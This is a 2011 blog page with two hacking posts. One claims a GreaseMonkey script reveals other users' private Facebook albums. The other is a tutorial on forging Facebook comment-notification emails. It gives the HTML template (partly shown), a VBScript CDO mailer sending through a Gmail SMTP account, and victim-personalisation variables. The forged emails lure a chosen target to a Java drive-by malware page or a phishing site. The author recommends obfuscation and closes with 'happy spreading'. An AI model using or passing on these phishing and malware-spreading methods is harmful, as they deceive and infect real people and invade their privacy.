Search This Blog

Sunday, February 6, 2011

How to view Private albums in Facebook !!!!!




How to view Private albums in Facebook !!!!!

View the Album of Any User Even if it is Private

Firstly You need to have GreaseMonkey Script(Works on Firefox,Opera and Internet Explorer)
You can download Greasemonkey here

Let Your Firefox Restart.
Now Go here

Press "INSTALL" Green color button on that page and install the script.
Navigate to any user's profile and Watch His private photos Ninja

How to Spam On Facebook (Earn Money)


How to Spam On Facebook (Earn Money)

Introduction
In this tutorial I will be showing you how to spread your file using a fake Facebook comment email. Basically your target gets an email that looks like it's from Facebook telling them someone commented on their staus. When they click to view the comment, it takes them to a URL of your choice, preferably set up with a Java drive-by (see below for screenshot).
This method requires Java drive-by to spread a file, which I will not be covering. It can just as easily be used to direct someone to a fake facebook website (phishing), which again I won't be covering here.

Why is this useful?
This can be useful if you want to spread your file to a specific person.
It can also be useful to get an automatic spreader working its magic among a certain group of people (ie. your facebook friends)

What do I need?
- Something at a URL of your choice (ie. a Java drive-by) - not covered here
- The full name of a friend of the person you are targeting
- The first name of the person you are targeting
- Windows (to run vbscript)
- Text editor - I use Notepad++
- SMTP server and account - ie if you use gmail you need a gmail account. I'd suggest creating one for this purpose.

Step 1
Firstly, you need two files - text file containing email body and a vbscript to send the email.

emailbody.txt - copy below and save as "emailbody.txt" (if you modify the name make sure to reflect this change in the vbscript)



<div class=WordSection1>

<table class=MsoNormalTable border=0 cellspacing=0 cellpadding=0 width=620
style='width:465.0pt;mso-cellspacing:0cm;mso-yfti-tbllook:1184;mso-padding-alt:
0cm 0cm 0cm 0cm'>
<tr style='mso-yfti-irow:0;mso-yfti-firstrow:yes'>
  <td style='background:#3B5998;padding:3.0pt 6.0pt 3.0pt 6.0pt'>
  <p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt;line-height:
  normal'><b><span style='font-size:12.0pt;font-family:"Tahoma","sans-serif";
  mso-fareast-font-family:"Times New Roman";color:white;letter-spacing:-.35pt;
  mso-fareast-language:EN-AU'><a
______________________________________________________________
sendemail.vbs - copy below text and save with "vbs" extension
Code:
Option Explicit

Call Email

Function Email
    Dim iMsg, iConf, Flds, schema

    Set iMsg = CreateObject("CDO.Message")
    Set iConf = CreateObject("CDO.Configuration")
    Set Flds = iConf.Fields
____________________________________________________________
Note: The html for the email body was created using MS Word's HTML conversion. I have taken out as much crap as I felt necessary. I have not cleaned it up as much as I could have as I didn't feel the need. The confusing code may actually be a good thing, given your intentions. Devlish

Step 2
You need to edit emailbody.txt. I'd suggest using 'find and replace' to make sure you get all instances.
These are variables in the file:

$RecipientFirstName - The first name of the person you are sending the email to
$FirstName - First name of person who COMMENTED on the above person's status
$FullName - Full name of person who COMMENTED on the recipient's status
$Comment - The comment made by the commenter ($Firstname)
$Email - Email address of the recipient (this is for the little link at the bottom of the email)
$URL - Address your java drive-by is located (or wherever you want)

Note: You may change other parts, for example change "$Fullname commented on your status." to "Fullname commented on [some_douche]'s status."

Step 3
You also need to edit sendemail.vbs. It's fairly sef-explanatory, but you need to provide the following:

SMTP server - currently set to smtp.gmail.com
Username - for above smtp server
Password - for above smtp server
Recipient's email
Email subject line - change $Fullname to the same as in step 2
emailbody.txt location - if not in the same directory as sendemail.vbs

Step 4
That's it! You are ready to run sendemail.vbs! I highly recommend testing the full process in a virtual machine! For example, send it to yourself, pretend to be your target and click links, make sure your drive-by works, etc.

Important
Please note that if using gmail's SMTP server, the 'from' email will NOT be the email they see. They will see the email of the gmail account you used. This is usually not displayed, for example in gmail you have to click 'Show Details' to see this info. I don't know if other SMTP servers do the same.

Conclusion
I hope you found this tutorial useful. Please give feedback and happy spreading :)